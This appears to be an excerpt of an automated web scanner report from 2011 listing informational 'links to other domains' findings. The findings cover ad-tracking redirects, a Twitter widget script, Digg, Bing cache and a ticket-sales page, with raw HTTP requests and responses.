http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js?REL-fansnap-1.20.2-r31787
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787
http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3
http://ecn.dev.virtualearth.net/mapcontrol/v6.3/js/atlascompat.js
http://www.bing.com/s/ack.html
http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:34:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 424
ETag: "13894ec26df92ffcfe8a7d45e8580ead"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311104083; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:43 GMT
Set-Cookie: _fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGkEIRfNFToSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NjgzMDI3NTU4NToRYmdfc3R5bGVfaWRzSSIABjsHRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAROhBzcHZfc3JjXzcwMVQ6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1z2huA5nTDigY6C29mZnNldGn%2BkJ06EXNwdl9zcmNfMTk4N1Q%3D--599dd929144daee7633c9982b135b8d1876ed56b; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 23596
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</title>
<link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" />

<!--[if lte IE 6]>
...[SNIP]...
<body class='seatscontroller landing_index '>
<iframe src="http://www.bing.com/s/ack.html" width="0" height="0" border="0" frameborder="0" style="display:none;" scrolling="no"></iframe>
...[SNIP]...
<br />
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
<div id='map-loading'>
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
</div>
<a href="http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1" id="primary-link" rel="nofollow" target="_blank">Check Official Box Office</a>
...[SNIP]...
</p>
<img alt="" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron2.gif?REL-fansnap-1.20.2-r31787" />
<img alt="" id="int-progress-img" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
<br />
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
<a class='closePingoutModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<a class='closeSurveyModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<a class='closeBrokerFilterModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<a class='closeArsecFilterModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<div class='bv-header-waiting'>
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
<h3>
...[SNIP]...
<a class='closeBVModal'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
<div class='photoHolder'>
<img alt="Photo" id="photoImage" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" />
</div>
...[SNIP]...
<a class='photoClose'>
<img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
...[SNIP]...
</script>
<script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
<![if !IE]><script src="http://ecn.dev.virtualearth.net/mapcontrol/v6.3/js/atlascompat.js"></script><![endif]>
<script src='http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3' type='text/javascript'></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...

20.21. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://bp.specificclick.net/?pixid=99062281

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1

Request

GET /?pixid=99062281 HTTP/1.1
Host: bp.specificclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: ug=WPTUOuwXp9NyRD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Tue, 19 Jul 2011 20:49:00 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1">here</a>
...[SNIP]...

20.22. http://cache.boston.com/universal/js/twitterwidget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.boston.com
Path:	/universal/js/twitterwidget.js

Issue detail

The page was loaded from a URL containing a query string:

http://cache.boston.com/universal/js/twitterwidget.js?v2

The response contains the following links to other domains:

http://twitter.com/
http://twitter.com/'+e+'
http://twitter.com/'+e.user+
http://twitter.com/'+e.user+'
http://twitter.com/'+i+'
http://twitter.com/'+this._getWidgetPath()+'
http://twitter.com/'+username+'/statuses/'+twitters[i].id+'
http://twitter.com/?status=@'+e.user+
http://twitter.com/search?q=%23'+e+'
http://widgets.twimg.com/j/1/twitter_logo_s.'+(a.ie?
http://www.twitter.com/'+reply.substring(1)+'

Request

GET /universal/js/twitterwidget.js?v2 HTTP/1.1
Host: cache.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:31:02 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Content-Type: application/javascript
Last-Modified: Wed, 22 Sep 2010 15:11:58 GMT
ETag: "3c5233-785c-490da91191fb8"
Accept-Ranges: bytes
Served-By: connor
Age: 765
Cache-Control: max-age=3591
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Tue, 19 Jul 2011 21:30:52 GMT
Via: 1.1 rhv082178010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 30812

function twitterCallback2(twitters) {
var statusHTML = [];
for (var i=0; i<twitters.length; i++){
var username = twitters[i].user.screen_name;
var status = twitters[i].text.replace(/((http
...[SNIP]...
</a>';
}).replace(/\B@([_a-z0-9]+)/ig, function(reply) {
return reply.charAt(0)+'<a href="http://www.twitter.com/'+reply.substring(1)+'">'+reply.substring(1)+'</a>
...[SNIP]...
</span> <a style="font-size:85%" href="http://twitter.com/'+username+'/statuses/'+twitters[i].id+'">'+relative_time(twitters[i].created_at)+'</a>
...[SNIP]...
</a>"+d})},at:function(c){return c.replace(/\B\@([a-zA-Z0-9_]{1,20})/g,function(d,e){return'@<a target="_blank" class="twtr-atreply" href="http://twitter.com/'+e+'">'+e+"</a>"})},list:function(c){return c.replace(/\B\@([a-zA-Z0-9_]{1,20}\/\w+)/g,function(d,e){return'@<a target="_blank" class="twtr-atreply" href="http://twitter.com/'+e+'">'+e+"</a>"})},hash:function(c){return c.replace(/\B\#(\w+)/gi,function(d,e){return'<a target="_blank" class="twtr-hashtag" href="http://twitter.com/search?q=%23'+e+'">#'+e+"</a>
...[SNIP]...
<div class="twtr-img"><a target="_blank" href="http://twitter.com/'+e.user+'"><img alt="'+e.user+' profile" src="'+e.avatar+'">
...[SNIP]...
<p> <a target="_blank" href="http://twitter.com/'+e.user+'" class="twtr-user">'+e.user+"</a>
...[SNIP]...
<i> <a target="_blank" class="twtr-timestamp" time="'+e.timestamp+'" href="http://twitter.com/'+e.user+"/status/"+e.id+'">'+e.created_at+'</a> <a target="_blank" class="twtr-reply" href="http://twitter.com/?status=@'+e.user+"%20&in_reply_to_status_id="+e.id+"&in_reply_to="+e.user+'">reply</a>
...[SNIP]...
<div><a target="_blank" href="http://twitter.com"><img alt="" src="http://widgets.twimg.com/j/1/twitter_logo_s.'+(a.ie?"gif":"png")+'"'+k()+'></a>
...[SNIP]...
<span><a target="_blank" class="twtr-join-conv" style="color:'+this.theme.shell.color+'" href="http://twitter.com/'+this._getWidgetPath()+'">'+this.footerText+"</a>
...[SNIP]...
.stop()}this.newResults=true;if(!this._profileImage&&this._isProfileWidget){var i=j[0].user.screen_name;this.setProfileImage(j[0].user.profile_image_url);this.setTitle(j[0].user.name);this.setCaption('<a target="_blank" href="http://twitter.com/'+i+'">'+i+"</a>
...[SNIP]...

20.23. http://cc.bingj.com/cache.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cc.bingj.com
Path:	/cache.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://cc.bingj.com/cache.aspx?q=xss.cx&d=4837056837976815&mkt=en-US&setlang=en-US&w=c0a8d758,848ac409

The response contains the following links to other domains:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
http://rt.trafficfacts.com/ns.php?k=58g8b2fdf373edb2af9436c38b82143b37ea8da413dh26
http://www.cloudscan.me/
http://www.google.com/jsapi
http://xss.cx/

Request

GET /cache.aspx?q=xss.cx&d=4837056837976815&mkt=en-US&setlang=en-US&w=c0a8d758,848ac409 HTTP/1.1
Host: cc.bingj.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 15:15:54 GMT
Content-Length: 8574
Connection: close

<base href="http://xss.cx/"/><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style type="text/css">#b_cpb{color: black; font: normal normal normal small norma
...[SNIP]...
<strong><a href="http://xss.cx/" onmousedown="return si_T('&ID=SERP,5003.1')">http://xss.cx/</a>
...[SNIP]...
visited it). This is the version of the page that was used for ranking your search results. The page may have changed since we last cached it. To see what might have changed (without the highlights), <a href="http://xss.cx/" onmousedown="return si_T('&ID=SERP,5003.2')">go to the current page</a>
...[SNIP]...
<li class="rtsLI rtsLast"><a title="Blog" class="rtsLink" href="http://www.cloudscan.me/"><span class="rtsOut">
...[SNIP]...
</div><script type="text/javascript" src="http://www.google.com/jsapi">
</script>
...[SNIP]...

<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
<noscript><img src="http://rt.trafficfacts.com/ns.php?k=58g8b2fdf373edb2af9436c38b82143b37ea8da413dh26" height="1" width="1" alt=""/></noscript>
...[SNIP]...

20.24. http://clk.specificclick.net/click/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.specificclick.net
Path:	/click/v=5

Issue detail

The page was loaded from a URL containing a query string:

http://clk.specificclick.net/click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=http://t.atdmt.com

The response contains the following link to another domain:

http://t.atdmt.com/

Request

Response

20.25. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=invitemedia

The response contains the following link to another domain:

http://g-pixel.invitemedia.com/gmatcher?id=CAESEBL6QfFdOZBFuwKtr4mXcyc&cver=1

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fsharethis.com%2Fprivacy&jsref=&rnd=1311085721255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEBL6QfFdOZBFuwKtr4mXcyc&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 14:28:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 278
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEBL6QfFdOZBFuwKtr4mXcyc&cver=1">here</A>
...[SNIP]...

20.26. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?google_nid=admeld&google_cm&google_sc&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&external_user_id=CAESEEm-rSLvlOjzT4MOGrRtRVA&google_cver=1

Request

Response

HTTP/1.1 302 Found
Location: http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&external_user_id=CAESEEm-rSLvlOjzT4MOGrRtRVA&google_cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 402
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tag.admeld.com/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=832&admeld_call_type=redirect&external_user_id=CAESEEm-rSLvlOjzT4MOGrRtRVA&google_cver=1">here</A>
...[SNIP]...

20.27. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=appnexus1

The response contains the following link to another domain:

http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz03MyZweGlkPTY5MzE%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:26:07 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1">here</A>
...[SNIP]...

20.28. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=themig&can=ffffffffffffffff

The response contains the following link to another domain:

http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1&can=ffffffffffffffff

Request

GET /pixel?nid=themig&can=ffffffffffffffff HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1&can=ffffffffffffffff
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 18:37:28 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 305
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1&can=ffffffffffffffff">here</A>
...[SNIP]...

20.29. http://developers.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://developers.facebook.com/?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/PSpx_i42gvE.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/N2f0JA5UPFU.png
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css

Request

GET /?ref=pf HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

20.30. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page was loaded from a URL containing a query string:

http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1
http://cdn1.diggstatic.com/img/favicon.a015f25c.ico
http://cdn2.diggstatic.com/css/two_column/library/global.184cd4bb.css
http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js
http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js
http://cdn4.diggstatic.com/css/two_column/App_Submission/index.53cd0655.css
http://www.surveymonkey.com/s/ZNBQMYJ

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=29908 10.2.128.186
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9012

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/two_column/library/global.184cd4bb.css" media="all">


<link rel="stylesheet" type="text/css" href="http://cdn4.diggstatic.com/css/two_column/App_Submission/index.53cd0655.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.surveymonkey.com/s/ZNBQMYJ" id="feedback-bar-survey">Take the survey</a>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

20.31. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0742401739139530&output=html&h=250&slotname=4384935633&w=250&lmt=1311136947&flash=10.3.181&url=http%3A%2F%2Fmajornelson.com%2F&dt=1311118945863&bpp=6&shv=r20110713&jsv=r20110627&correlator=1311118947498&frm=4&adk=2623290263&ga_vid=777545616.1311118951&ga_sid=1311118951&ga_hid=1083990928&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=1049&bih=723&fu=0&ifi=1&dtd=M&xpc=NDGHfy2VsO&p=http%3A//majornelson.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://majornelson.com/%26hl%3Den%26client%3Dca-pub-0742401739139530%26adU%3Daxosoft.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGW31YiDsZ6SSUeUeo_Ooj_hYjYFg

Request

